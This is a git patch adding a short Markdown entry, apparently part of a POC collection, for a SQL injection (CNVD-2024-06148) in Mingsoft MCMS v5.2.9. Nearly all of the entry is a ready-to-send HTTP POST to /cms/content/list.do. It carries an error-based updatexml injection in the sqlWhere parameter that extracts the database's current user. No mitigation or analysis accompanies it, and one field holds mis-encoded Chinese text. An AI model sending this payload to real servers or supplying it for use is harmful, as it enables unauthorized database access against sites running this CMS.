From 9972417a9ad1ac2147a6f721d74ca48461c4a965 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 30 Apr 2024 12:29:46 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=20Mingsoft-MCMS=E5=89=8D=E5=8F=B0?=
 =?UTF-8?q?=E6=9F=A5=E8=AF=A2=E6=96=87=E7=AB=A0=E5=88=97=E8=A1=A8=E6=8E=A5?=
 =?UTF-8?q?=E5=8F=A3SQL=E6=B3=A8=E5=85=A5(CNVD-2024-06148).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...�查询文章列表接口SQL注入(CNVD-2024-06148).md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md

diff --git a/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md b/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md
new file mode 100644
index 0000000..d68b624
--- /dev/null
+++ b/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md
@@ -0,0 +1,19 @@
+ ## Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148)
+
+## 版本
+```
+ v5.2.9
+```
+
+## poc
+```
+POST /cms/content/list.do HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+Connection: close
+Content-Length: 326
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate, br
+
+categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2c(SELECT%20%20current_user)%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22æç« æ é¢%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10
+```